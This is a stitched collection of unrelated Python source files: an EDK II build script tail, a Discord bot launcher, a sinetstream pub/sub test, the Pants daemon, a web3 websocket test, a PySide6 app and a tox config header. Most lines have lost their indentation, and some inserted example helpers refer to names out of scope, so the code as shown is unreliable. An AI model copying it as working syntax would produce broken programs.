else:
self._MultiThreadBuildPlatform()
else:
self.SpawnMode = False
self._BuildModule()
if self.Target == 'cleanall':
RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
for Module in self.BuildModules:
Module.CreateAsBuiltInf()
def GenDestCache(self):
for Module in self.AllModules:
Module.GenPreMakefileHashList()
Module.GenMakefileHashList()
Module.CopyModuleToCache()
def GenLocalPreMakeCache(self):
for Module in self.PreMakeCacheMiss:
Module.GenPreMakefileHashList()
## Do some clean-up works when error occurred
def Relinquish(self):
OldLogLevel = EdkLogger.GetLevel()
EdkLogger.SetLevel(EdkLogger.ERROR)
Utils.Progressor.Abort()
if self.SpawnMode == True:
BuildTask.Abort()
EdkLogger.SetLevel(OldLogLevel)
def ParseDefines(DefineList=[]):
DefineDict = {}
if DefineList is not None:
for Define in DefineList:
DefineTokenList = Define.split("=", 1)
if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
EdkLogger.error('build', FORMAT_INVALID,
"The macro name must be in the pattern [A-Z][A-Z0-9_]*",
ExtraData=DefineTokenList[0])
if len(DefineTokenList) == 1:
DefineDict[DefineTokenList[0]] = "TRUE"
else:
DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
return DefineDict
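# Illustrative sketch: ParseDefines(["SECURE_BOOT_ENABLE", "FV_SPARE_SPACE_THRESHOLD=0x1000"])
# returns {'SECURE_BOOT_ENABLE': 'TRUE', 'FV_SPARE_SPACE_THRESHOLD': '0x1000'}; a
# name that does not match gMacroNamePattern (e.g. "1BAD") is rejected with a
# FORMAT_INVALID build error.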
def LogBuildTime(Time):
if Time:
TimeDurStr = ''
TimeDur = time.gmtime(Time)
if TimeDur.tm_yday > 1:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur) + ", %d day(s)" % (TimeDur.tm_yday - 1)
else:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur)
return TimeDurStr
else:
return None
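# Illustrative sketch: LogBuildTime(3725) formats 3725 seconds as '01:02:05', and a
# duration longer than a day gains a ', N day(s)' suffix, e.g. LogBuildTime(90000)
# returns '01:00:00, 1 day(s)'.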
def ThreadNum():
OptionParser = MyOptionParser()
if not OptionParser.BuildOption and not OptionParser.BuildTarget:
OptionParser.GetOption()
BuildOption, BuildTarget = OptionParser.BuildOption, OptionParser.BuildTarget
ThreadNumber = BuildOption.ThreadNumber
GlobalData.gCmdConfDir = BuildOption.ConfDirectory
if ThreadNumber is None:
TargetObj = TargetTxtDict()
ThreadNumber = TargetObj.Target.TargetTxtDictionary[TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
if ThreadNumber == '':
ThreadNumber = 0
else:
ThreadNumber = int(ThreadNumber, 0)
if ThreadNumber == 0:
try:
ThreadNumber = multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
ThreadNumber = 1
return ThreadNumber
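# Illustrative sketch: the thread count resolves in this order -- the thread-number
# value from the parsed command-line options, then MAX_CONCURRENT_THREAD_NUMBER from
# target.txt, and finally multiprocessing.cpu_count() when both are unset or 0
# (falling back to 1 if the CPU count cannot be determined).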
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
LogQMaxSize = ThreadNum() * 10
def Main():
StartTime = time.time()
#
# Create a log Queue
#
LogQ = mp.Queue(LogQMaxSize)
# Initialize log system
EdkLogger.LogClientInitialize(LogQ)
GlobalData.gCommand = sys.argv[1:]
#
# Parse the options and args
#
OptionParser = MyOptionParser()
if not OptionParser.BuildOption and not OptionParser.BuildTarget:
OptionParser.GetOption()
Option, Target = OptionParser.BuildOption, OptionParser.BuildTarget
GlobalData.gOptions = Option
GlobalData.gCaseInsensitive = Option.CaseInsensitive
# Set log level
LogLevel = EdkLogger.INFO
if Option.verbose is not None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
LogLevel = EdkLogger.VERBOSE
elif Option.quiet is not None:
EdkLogger.SetLevel(EdkLogger.QUIET)
LogLevel = EdkLogger.QUIET
elif Option.debug is not None:
EdkLogger.SetLevel(Option.debug + 1)
LogLevel = Option.debug + 1
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if Option.WarningAsError == True:
EdkLogger.SetWarningAsError()
Log_Agent = LogAgent(LogQ,LogLevel,Option.LogFile)
Log_Agent.start()
if platform.platform().find("Windows") >= 0:
GlobalData.gIsWindows = True
else:
GlobalData.gIsWindows = False
EdkLogger.quiet("Build environment: %s" % platform.platform())
EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
ReturnCode = 0
MyBuild = None
BuildError = True
try:
if len(Target) == 0:
Target = "all"
elif len(Target) >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
else:
Target = Target[0].lower()
if Target not in gSupportedTarget:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
#
# Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
#
CheckEnvVariable()
GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
Workspace = os.getenv("WORKSPACE")
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = Utils.DirCache(Workspace)
WorkingDirectory = os.getcwd()
if not Option.ModuleFile:
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
elif FileNum == 1:
Option.ModuleFile = NormFile(FileList[0], Workspace)
if Option.ModuleFile:
if os.path.isabs (Option.ModuleFile):
if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.PlatformFile is not None:
if os.path.isabs (Option.PlatformFile):
if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
if Option.FdfFile is not None:
if os.path.isabs (Option.FdfFile):
if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
Option.FdfFile = PathClass(Option.FdfFile, Workspace)
ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.Flag is not None and Option.Flag not in ['-c', '-s']:
EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
MyBuild = Build(Target, Workspace, Option,LogQ)
GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
if not (MyBuild.LaunchPrebuildFlag and os.path.exists(MyBuild.PlatformBuildPath)):
MyBuild.Launch()
#
# All job done, no error found and no exception raised
#
BuildError = False
except FatalError as X:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = X.args[0]
except Warning as X:
# error from Fdf parser
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
else:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
ReturnCode = FORMAT_INVALID
except KeyboardInterrupt:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
ReturnCode = ABORT_ERROR
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
except:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
# try to get the meta-file from the object causing exception
Tb = sys.exc_info()[-1]
MetaFile = GlobalData.gProcessingFile
while Tb is not None:
if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
Tb = Tb.tb_next
EdkLogger.error(
"\nbuild",
CODE_ERROR,
"Unknown fatal error when processing [%s]" % MetaFile,
ExtraData="\n(Please send email to %s for help, attaching following call stack trace!)\n" % MSG_EDKII_MAIL_ADDR,
RaiseError=False
)
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
Utils.Progressor.Abort()
Utils.ClearDuplicatedInf()
if ReturnCode == 0:
try:
MyBuild.LaunchPostbuild()
Conclusion = "Done"
except:
Conclusion = "Failed"
ReturnCode = POSTBUILD_ERROR
elif ReturnCode == ABORT_ERROR:
Conclusion = "Aborted"
else:
Conclusion = "Failed"
FinishTime = time.time()
BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
BuildDurationStr = ""
if BuildDuration.tm_yday > 1:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)" % (BuildDuration.tm_yday - 1)
else:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
if MyBuild is not None:
if not BuildError:
MyBuild.BuildReport.GenerateReport(BuildDurationStr, LogBuildTime(MyBuild.AutoGenTime), LogBuildTime(MyBuild.MakeTime), LogBuildTime(MyBuild.GenFdsTime))
EdkLogger.SetLevel(EdkLogger.QUIET)
EdkLogger.quiet("\n- %s -" % Conclusion)
EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
Log_Agent.kill()
Log_Agent.join()
return ReturnCode
if __name__ == '__main__':
try:
mp.set_start_method('spawn')
except:
pass
r = Main()
## 0-127 is a safe return range, and 1 is a standard default error
if r < 0 or r > 127: r = 1
sys.exit(r)
|
start.py
|
import threading
from discord.ext import commands
import discord
from website import create_app
from cogs import generalCommands, events, leaderboard
from settings import configFunctions
global client
client = commands.Bot(command_prefix=commands.when_mentioned_or(configFunctions.getCommandPrefix()), description='Your local BertieBot')
global serverid
def startWebsite():
    napp = create_app(client)
    napp.run('0.0.0.0', port=configFunctions.getPortNumber())
if __name__ == '__main__':
websiteThread = threading.Thread(target=startWebsite)
websiteThread.start()
client.add_cog(generalCommands.GeneralCommands(client))
client.add_cog(events.Events(client))
client.add_cog(leaderboard.Leaderboard(client))
client.run(configFunctions.getBotToken())
|
test_pubsub.py
|
#!/usr/local/bin/python3.6
# vim: expandtab shiftwidth=4
# Copyright (C) 2019 National Institute of Informatics
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import copy
import logging
import os
from pathlib import Path
from queue import Queue
from tempfile import TemporaryDirectory
from threading import Thread, Event
import pytest
from conftest import BROKER, SERVICE, TOPIC, create_config_file
from sinetstream import MessageReader, MessageWriter
logging.basicConfig(level=logging.CRITICAL)
logger = logging.getLogger(__name__)
pytestmark = pytest.mark.usefixtures('setup_config')
text_msgs = [
'test message 001',
'test message 002',
]
ev = Event()
def reader(que, len_msgs, *args, **kwargs):
try:
with MessageReader(*args, **kwargs) as f:
ev.set()
logger.debug("start message reading")
f.seek_to_beginning()
for idx, msg in zip(range(len_msgs), f):
logger.info(f"read message: {msg.raw}")
que.put(msg)
finally:
ev.set()
def writer(msgs, *args, **kwargs):
ev.wait()
logger.debug("start message writing")
with MessageWriter(*args, **kwargs) as f:
for msg in msgs:
logger.info(f"write message: {msg}")
f.publish(msg)
def new_topic():
from random import choices
from string import ascii_letters
return TOPIC + '-' + ''.join(choices(ascii_letters, k=10))
@pytest.fixture()
def pubsub():
q = Queue()
msgs = copy.copy(text_msgs)
topic = new_topic()
reader_params = {
'service': SERVICE,
'topics': topic,
}
writer_params = {
'service': SERVICE,
'topic': topic,
}
yield msgs, reader_params, writer_params
ev.clear()
ths = [
Thread(target=reader, args=(q, len(msgs)), kwargs=reader_params),
Thread(target=writer, args=(msgs, ), kwargs=writer_params),
]
for th in ths:
th.start()
for th in ths:
th.join()
for expected in msgs:
msg = q.get_nowait()
assert msg.topic == topic
assert msg.value == expected
def test_pubsub(pubsub):
msgs, _, _ = pubsub
msgs.clear()
msgs.extend([x.encode() for x in text_msgs])
hdr = b"XXX"
def ser(x):
return hdr + x.encode()
def des(x):
return x[len(hdr):].decode()
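# A tiny check (added for illustration, not in the original tests): ser() and
# des() above are inverses, framing each payload with the b"XXX" header.
def _example_serdes_roundtrip():
    framed = ser(text_msgs[0])
    assert framed.startswith(hdr)
    assert des(framed) == text_msgs[0]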
def test_pubsub_serdes(pubsub):
_, reader_params, writer_params = pubsub
reader_params.update({'value_deserializer': des})
writer_params.update({'value_serializer': ser})
def test_pubsub_value_type(pubsub):
_, reader_params, writer_params = pubsub
reader_params.update({'value_type': "text"})
writer_params.update({'value_type': "text"})
@pytest.mark.parametrize('config_value_type', ['text'])
def test_pubsub_value_type_config(pubsub):
pass
@pytest.mark.parametrize('config_value_type', ['image'])
def test_pubsub_value_type_config_and_arg(pubsub):
_, reader_params, writer_params = pubsub
reader_params.update({'value_type': "text"})
writer_params.update({'value_type': "text"})
@pytest.fixture(scope='module', autouse=True)
def create_topic():
cwd = Path.cwd().absolute()
with TemporaryDirectory() as work_dir:
try:
os.chdir(str(work_dir))
create_config_file(brokers=[BROKER])
topic = new_topic()
with MessageWriter(SERVICE, topic) as f:
logger.debug(f"create topic: {topic}")
f.publish(b"message 000")
finally:
os.chdir(str(cwd))
|
pants_daemon.py
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import os
import sys
import threading
from contextlib import contextmanager
from setproctitle import setproctitle as set_process_title
from pants.base.build_environment import get_buildroot
from pants.base.exiter import Exiter
from pants.bin.daemon_pants_runner import DaemonExiter, DaemonPantsRunner
from pants.bin.engine_initializer import EngineInitializer
from pants.engine.native import Native
from pants.init.target_roots_calculator import TargetRootsCalculator
from pants.logging.setup import setup_logging
from pants.option.arg_splitter import GLOBAL_SCOPE
from pants.option.options_bootstrapper import OptionsBootstrapper
from pants.option.options_fingerprinter import OptionsFingerprinter
from pants.pantsd.process_manager import FingerprintedProcessManager
from pants.pantsd.service.fs_event_service import FSEventService
from pants.pantsd.service.pailgun_service import PailgunService
from pants.pantsd.service.scheduler_service import SchedulerService
from pants.pantsd.service.store_gc_service import StoreGCService
from pants.pantsd.watchman_launcher import WatchmanLauncher
from pants.util.collections import combined_dict
from pants.util.contextutil import stdio_as
from pants.util.memo import memoized_property
class _LoggerStream(object):
"""A sys.{stdout,stderr} replacement that pipes output to a logger."""
def __init__(self, logger, log_level, handler):
"""
:param logging.Logger logger: The logger instance to emit writes to.
:param int log_level: The log level to use for the given logger.
:param Handler handler: The underlying log handler, for determining the fileno
to support faulthandler logging.
"""
self._logger = logger
self._log_level = log_level
self._handler = handler
def write(self, msg):
for line in msg.rstrip().splitlines():
self._logger.log(self._log_level, line.rstrip())
def flush(self):
return
def isatty(self):
return False
def fileno(self):
return self._handler.stream.fileno()
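# A minimal usage sketch (not part of the original module): _LoggerStream is
# meant to replace sys.stdout/sys.stderr so stray writes are routed to a
# logger, which is what run_sync() below does for the daemon's own streams.
def _example_logger_stream():
  handler = logging.StreamHandler(sys.__stderr__)
  example_logger = logging.getLogger('pantsd.example')
  example_logger.addHandler(handler)
  sys.stdout = _LoggerStream(example_logger, logging.INFO, handler)
  print('this line ends up in the logger, not the original stdout')
  sys.stdout = sys.__stdout__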
class PantsDaemon(FingerprintedProcessManager):
"""A daemon that manages PantsService instances."""
JOIN_TIMEOUT_SECONDS = 1
LOG_NAME = 'pantsd.log'
class StartupFailure(Exception):
"""Represents a failure to start pantsd."""
class RuntimeFailure(Exception):
"""Represents a pantsd failure at runtime, usually from an underlying service failure."""
class Factory(object):
@classmethod
def maybe_launch(cls, bootstrap_options=None):
"""Creates and launches a daemon instance if one does not already exist.
:param Options bootstrap_options: The bootstrap options, if available.
:returns: The pailgun port number of the running pantsd instance.
:rtype: int
"""
stub_pantsd = cls.create(bootstrap_options, full_init=False)
with stub_pantsd.lifecycle_lock:
if stub_pantsd.needs_restart(stub_pantsd.options_fingerprint):
# Once we determine we actually need to launch, recreate with full initialization.
pantsd = cls.create(bootstrap_options)
return pantsd.launch()
else:
return stub_pantsd.read_named_socket('pailgun', int)
@classmethod
def create(cls, bootstrap_options=None, full_init=True):
"""
:param Options bootstrap_options: The bootstrap options, if available.
:param bool full_init: Whether or not to fully initialize an engine et al for the purposes
of spawning a new daemon. `full_init=False` is intended primarily
for lightweight lifecycle checks (since there is a ~1s overhead to
initialize the engine). See the impl of `maybe_launch` for an example
of the intended usage.
"""
bootstrap_options = bootstrap_options or cls._parse_bootstrap_options()
bootstrap_options_values = bootstrap_options.for_global_scope()
# TODO: https://github.com/pantsbuild/pants/issues/3479
watchman = WatchmanLauncher.create(bootstrap_options_values).watchman
native = None
build_root = None
services = None
port_map = None
if full_init:
build_root = get_buildroot()
native = Native.create(bootstrap_options_values)
legacy_graph_helper = cls._setup_legacy_graph_helper(native, bootstrap_options_values)
services, port_map = cls._setup_services(
build_root,
bootstrap_options_values,
legacy_graph_helper,
watchman
)
return PantsDaemon(
native=native,
build_root=build_root,
work_dir=bootstrap_options_values.pants_workdir,
log_level=bootstrap_options_values.level.upper(),
services=services,
socket_map=port_map,
metadata_base_dir=bootstrap_options_values.pants_subprocessdir,
bootstrap_options=bootstrap_options
)
@staticmethod
def _parse_bootstrap_options():
return OptionsBootstrapper().get_bootstrap_options()
@staticmethod
def _setup_legacy_graph_helper(native, bootstrap_options):
"""Initializes a `LegacyGraphHelper` instance."""
return EngineInitializer.setup_legacy_graph(
bootstrap_options.pants_ignore,
bootstrap_options.pants_workdir,
bootstrap_options.build_file_imports,
native=native,
build_ignore_patterns=bootstrap_options.build_ignore,
exclude_target_regexps=bootstrap_options.exclude_target_regexp,
subproject_roots=bootstrap_options.subproject_roots,
)
@staticmethod
def _setup_services(build_root, bootstrap_options, legacy_graph_helper, watchman):
"""Initialize pantsd services.
:returns: A tuple of (`tuple` service_instances, `dict` port_map).
"""
fs_event_service = FSEventService(
watchman,
build_root,
bootstrap_options.pantsd_fs_event_workers
)
scheduler_service = SchedulerService(
fs_event_service,
legacy_graph_helper,
build_root,
bootstrap_options.pantsd_invalidation_globs
)
pailgun_service = PailgunService(
bind_addr=(bootstrap_options.pantsd_pailgun_host, bootstrap_options.pantsd_pailgun_port),
exiter_class=DaemonExiter,
runner_class=DaemonPantsRunner,
target_roots_calculator=TargetRootsCalculator,
scheduler_service=scheduler_service
)
store_gc_service = StoreGCService(legacy_graph_helper.scheduler)
return (
# Services.
(fs_event_service, scheduler_service, pailgun_service, store_gc_service),
# Port map.
dict(pailgun=pailgun_service.pailgun_port)
)
def __init__(self, native, build_root, work_dir, log_level, services, socket_map,
metadata_base_dir, bootstrap_options=None):
"""
:param Native native: A `Native` instance.
:param string build_root: The pants build root.
:param string work_dir: The pants work directory.
:param string log_level: The log level to use for daemon logging.
:param string metadata_base_dir: The ProcessManager metadata base dir.
:param Options bootstrap_options: The bootstrap options, if available.
"""
super(PantsDaemon, self).__init__(name='pantsd', metadata_base_dir=metadata_base_dir)
self._native = native
self._build_root = build_root
self._work_dir = work_dir
self._log_level = log_level
self._services = services
self._socket_map = socket_map
self._bootstrap_options = bootstrap_options
self._log_dir = os.path.join(work_dir, self.name)
self._logger = logging.getLogger(__name__)
# A lock to guard the service thread lifecycles. This can be used by individual services
# to safeguard daemon-synchronous sections that should be protected from abrupt teardown.
self._lifecycle_lock = threading.RLock()
# A lock to guard pantsd->runner forks. This can be used by services to safeguard resources
# held by threads at fork time, so that we can fork without deadlocking.
self._fork_lock = threading.RLock()
# N.B. This Event is used as nothing more than a convenient atomic flag - nothing waits on it.
self._kill_switch = threading.Event()
self._exiter = Exiter()
@memoized_property
def watchman_launcher(self):
return WatchmanLauncher.create(self._bootstrap_options.for_global_scope())
@property
def is_killed(self):
return self._kill_switch.is_set()
@property
def options_fingerprint(self):
return OptionsFingerprinter.combined_options_fingerprint_for_scope(
GLOBAL_SCOPE,
self._bootstrap_options,
fingerprint_key='daemon',
invert=True
)
def shutdown(self, service_thread_map):
"""Gracefully terminate all services and kill the main PantsDaemon loop."""
with self._lifecycle_lock:
for service, service_thread in service_thread_map.items():
self._logger.info('terminating pantsd service: {}'.format(service))
service.terminate()
service_thread.join(self.JOIN_TIMEOUT_SECONDS)
self._logger.info('terminating pantsd')
self._kill_switch.set()
@staticmethod
def _close_stdio():
"""Close stdio streams to avoid output in the tty that launched pantsd."""
for fd in (sys.stdin, sys.stdout, sys.stderr):
file_no = fd.fileno()
fd.flush()
fd.close()
os.close(file_no)
@contextmanager
def _pantsd_logging(self):
"""A context manager that runs with pantsd logging.
Asserts that stdio (represented by file handles 0, 1, 2) is closed to ensure that
we can safely reuse those fd numbers.
"""
# Ensure that stdio is closed so that we can safely reuse those file descriptors.
for fd in (0, 1, 2):
try:
os.fdopen(fd)
raise AssertionError(
'pantsd logging cannot initialize while stdio is open: {}'.format(fd))
except OSError:
pass
# Redirect stdio to /dev/null for the rest of the run, to reserve those file descriptors
# for further forks.
with stdio_as(stdin_fd=-1, stdout_fd=-1, stderr_fd=-1):
# Reinitialize logging for the daemon context.
result = setup_logging(self._log_level, log_dir=self._log_dir, log_name=self.LOG_NAME)
# Do a python-level redirect of stdout/stderr, which will not disturb `0,1,2`.
# TODO: Consider giving these pipes/actual fds, in order to make them "deep" replacements
# for `1,2`, and allow them to be used via `stdio_as`.
sys.stdout = _LoggerStream(logging.getLogger(), logging.INFO, result.log_handler)
sys.stderr = _LoggerStream(logging.getLogger(), logging.WARN, result.log_handler)
self._logger.debug('logging initialized')
yield result.log_handler.stream
def _setup_services(self, services):
assert self._lifecycle_lock is not None, 'PantsDaemon lock has not been set!'
assert self._fork_lock is not None, 'PantsDaemon fork lock has not been set!'
for service in services:
self._logger.info('setting up service {}'.format(service))
service.setup(self._lifecycle_lock, self._fork_lock)
@staticmethod
def _make_thread(target):
t = threading.Thread(target=target)
t.daemon = True
return t
def _run_services(self, services):
"""Service runner main loop."""
if not services:
self._logger.critical('no services to run, bailing!')
return
service_thread_map = {service: self._make_thread(service.run) for service in services}
# Start services.
for service, service_thread in service_thread_map.items():
self._logger.info('starting service {}'.format(service))
try:
service_thread.start()
except (RuntimeError, service.ServiceError):
self.shutdown(service_thread_map)
raise self.StartupFailure('service {} failed to start, shutting down!'.format(service))
# Once all services are started, write our pid.
self.write_pid()
self.write_metadata_by_name('pantsd', self.FINGERPRINT_KEY, self.options_fingerprint)
# Monitor services.
while not self.is_killed:
for service, service_thread in service_thread_map.items():
if not service_thread.is_alive():
self.shutdown(service_thread_map)
raise self.RuntimeFailure('service failure for {}, shutting down!'.format(service))
else:
# Avoid excessive CPU utilization.
service_thread.join(self.JOIN_TIMEOUT_SECONDS)
def _write_named_sockets(self, socket_map):
"""Write multiple named sockets using a socket mapping."""
for socket_name, socket_info in socket_map.items():
self.write_named_socket(socket_name, socket_info)
def run_sync(self):
"""Synchronously run pantsd."""
# Switch log output to the daemon's log stream from here forward.
self._close_stdio()
with self._pantsd_logging() as log_stream:
self._exiter.set_except_hook(log_stream)
self._logger.info('pantsd starting, log level is {}'.format(self._log_level))
self._native.set_panic_handler()
# Set the process name in ps output to 'pantsd' vs './pants compile src/etc:: -ldebug'.
set_process_title('pantsd [{}]'.format(self._build_root))
# Write service socket information to .pids.
self._write_named_sockets(self._socket_map)
# Enter the main service runner loop.
self._setup_services(self._services)
self._run_services(self._services)
def post_fork_child(self):
"""Post-fork() child callback for ProcessManager.daemon_spawn()."""
entry_point = '{}:launch'.format(__name__)
exec_env = combined_dict(os.environ, dict(PANTS_ENTRYPOINT=entry_point))
# Pass all of sys.argv so that we can proxy arg flags e.g. `-ldebug`.
cmd = [sys.executable] + sys.argv
self._logger.debug('cmd is: PANTS_ENTRYPOINT={} {}'.format(entry_point, ' '.join(cmd)))
# TODO: Improve error handling on launch failures.
os.spawnve(os.P_NOWAIT, sys.executable, cmd, env=exec_env)
def needs_launch(self):
"""Determines if pantsd needs to be launched.
N.B. This should always be called under care of `self.lifecycle_lock`.
:returns: True if the daemon needs launching, False otherwise.
:rtype: bool
"""
new_fingerprint = self.options_fingerprint
self._logger.debug('pantsd: is_alive={} new_fingerprint={} current_fingerprint={}'
.format(self.is_alive(), new_fingerprint, self.fingerprint))
return self.needs_restart(new_fingerprint)
def launch(self):
"""Launches pantsd in a subprocess.
N.B. This should always be called under care of `self.lifecycle_lock`.
:returns: The port that pantsd is listening on.
:rtype: int
"""
self.terminate(include_watchman=False)
self.watchman_launcher.maybe_launch()
self._logger.debug('launching pantsd')
self.daemon_spawn()
# Wait up to 60 seconds for pantsd to write its pidfile.
self.await_pid(60)
listening_port = self.read_named_socket('pailgun', int)
self._logger.debug('pantsd is running at pid {}, pailgun port is {}'
.format(self.pid, listening_port))
return listening_port
def terminate(self, include_watchman=True):
"""Terminates pantsd and watchman."""
with self.lifecycle_lock:
super(PantsDaemon, self).terminate()
if include_watchman:
self.watchman_launcher.terminate()
def launch():
"""An external entrypoint that spawns a new pantsd instance."""
PantsDaemon.Factory.create().run_sync()
|
test_websocket_provider.py
|
import asyncio
import pytest
import sys
from threading import (
Thread,
)
import websockets
from tests.utils import (
wait_for_ws,
)
from web3 import Web3
from web3.exceptions import (
ValidationError,
)
from web3.providers.websocket import (
WebsocketProvider,
)
if sys.version_info >= (3, 8):
from asyncio.exceptions import (
TimeoutError,
)
else:
from concurrent.futures import (
TimeoutError,
)
@pytest.fixture
def start_websocket_server(open_port):
event_loop = asyncio.new_event_loop()
def run_server():
async def empty_server(websocket, path):
data = await websocket.recv()
await asyncio.sleep(0.02)
await websocket.send(data)
asyncio.set_event_loop(event_loop)
server = websockets.serve(empty_server, '127.0.0.1', open_port)
event_loop.run_until_complete(server)
event_loop.run_forever()
thd = Thread(target=run_server)
thd.start()
try:
yield
finally:
event_loop.call_soon_threadsafe(event_loop.stop)
@pytest.fixture
def w3(open_port, start_websocket_server):
# need new event loop as the one used by server is already running
event_loop = asyncio.new_event_loop()
endpoint_uri = 'ws://127.0.0.1:{}'.format(open_port)
event_loop.run_until_complete(wait_for_ws(endpoint_uri))
provider = WebsocketProvider(endpoint_uri, websocket_timeout=0.01)
return Web3(provider)
def test_websocket_provider_timeout(w3):
with pytest.raises(TimeoutError):
w3.eth.accounts
def test_restricted_websocket_kwargs():
invalid_kwargs = {'uri': 'ws://127.0.0.1:8546'}
re_exc_message = r'.*found: {0}*'.format(set(invalid_kwargs.keys()))
with pytest.raises(ValidationError, match=re_exc_message):
WebsocketProvider(websocket_kwargs=invalid_kwargs)
|
app.py
|
from PySide6.QtCore import QFile, QTextStream
from PySide6.QtWidgets import QApplication, QWidget
import sys
import threading
from extension.utils import get_tools
from peewee import *
get_tools()
from file_cabinet.models import Drawer
app = QApplication(sys.argv)
from main.ui import MainWindow
from main.settings import tool
window = MainWindow()
window.show()
from upd.conf import settings
with open("stylesheet/normal.qss", "r") as qss_file:
    rendered = qss_file.read().format(**settings.to_dict())
app.setStyleSheet(rendered)
t = threading.Thread(target=window.load)
t.start()
sys.exit(app.exec())
|
__init__.py
|
from __future__ import print_function
import argparse
import itertools
import os
import random
import re
import shlex
import string
import sys
import traceback
import warnings
from collections import OrderedDict
from fnmatch import fnmatchcase
from subprocess import list2cmdline
from threading import Thread
import pluggy
import py
import toml
from packaging import requirements
from packaging.utils import canonicalize_name
import tox
from tox.constants import INFO
from tox.exception import MissingDependency
from tox.interpreters import Interpreters, NoInterpreterInfo
from tox.reporter import (
REPORTER_TIMESTAMP_ON_ENV,
error,
update_default_reporter,
using,
verbosity1,
)
from tox.util.path import ensure_empty_dir
from tox.util.stdlib import importlib_metadata
from .parallel import ENV_VAR_KEY_PRIVATE as PARALLEL_ENV_VAR_KEY_PRIVATE
from .parallel import ENV_VAR_KEY_PUBLIC as PARALLEL_ENV_VAR_KEY_PUBLIC
from .parallel import add_parallel_config, add_parallel_flags
from .reporter import add_verbosity_commands
try:
from shlex import quote as shlex_quote
except ImportError:
from pipes import quote as shlex_quote
hookimpl = tox.hookimpl
"""DEPRECATED - REMOVE - left for compatibility with plugins importing from here.
Import hookimpl directly from tox instead.
"""
WITHIN_PROVISION = os.environ.get(str("TOX_PROVISION")) == "1"
INTERRUPT_TIMEOUT = 0.3
TERMINATE_TIMEOUT = 0.2
